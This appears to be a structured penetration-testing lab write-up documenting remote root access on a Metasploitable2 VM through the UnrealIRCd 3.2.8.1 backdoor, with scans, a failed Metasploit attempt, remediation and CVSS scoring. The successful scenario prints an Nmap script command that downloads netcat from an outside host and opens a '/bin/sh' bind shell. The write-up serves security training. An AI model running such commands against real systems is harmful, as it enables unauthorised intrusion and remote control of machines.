## Version 1.4.1
## language: en
Feature:
  TOE:
    Metasploitable2
  Location:
    192.168.199.130:6667 TCP
  CWE:
    CWE-0928: Weaknesses in OWASP
  Rule:
    REQ.142 Change system default credentials
  Goal:
    Get remote shell on the machine
  Recommendation:
    Update UnrealIRCd

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-linux      | 2020.4      |
    | VMware          | 16.1.0      |
    | Nmap            | 7.70        |
    | Metasploit      | 5.0.4       |

  TOE information:
    Given I am running Metasploitable 2 on VMware Workstation 15
    And I am using kali-linux

  Scenario: Normal use case
    Users can login into the IRC server
    Given I access using the ip from Metasploitable 2
    When I try to connect using netcat
    Then I can see [evidence](irc.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then This can't be done

  Scenario: Dynamic detection - Service Enumeration
    Given I know the machine have some open services
    When I scan with Nmap for open ports
      """
      $ nmap -A -T4 -p- 192.168.199.130
      6667/tcp  open  irc   UnrealIRCd
        users: 1
        servers: 1
        server: irc.Metasploitable.LAN
        version: Unreal3.2.8.1 irc.Metasploitable.LAN
      6697/tcp  open  irc   UnrealIRCd
      """
    Then I can conclude that anyone can get access remotely

  Scenario: Fail: Metasploit backdoor command execution
    Given The port 6667 is open
    And I search for 'Unreal 3.2.8.1 exploit' on Google
    When I open msfconsole
    And I search for 'unreal'
    Then I get the results [evidence](search.png)
    And I use exploit/unix/irc/unreal_ircd_3281_backdoor
    When I run the exploit
    Then I get the error [evidence](fail.png)

  Scenario: Success: Nmap unrealircd backdoor script
    Given The port 6667 run an outdated version of unrealircd
    When I execute the following command on the console
    """
    $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-
    unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc &&
    chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' 192.168.199.130
    """
    And I create a listener with
    """
    $ nc -n -vv 192.168.199.130 4444
    """
    Then I got access as root [evidence](root.png)

  Scenario: Remediation
    Given The compromised version of unrealIRCd running on the machine
    And The official correction from the 13rd of april 2009
    Then To fix it, an updated version must be downloaded

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.3/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.0/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.0/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2021-02-20
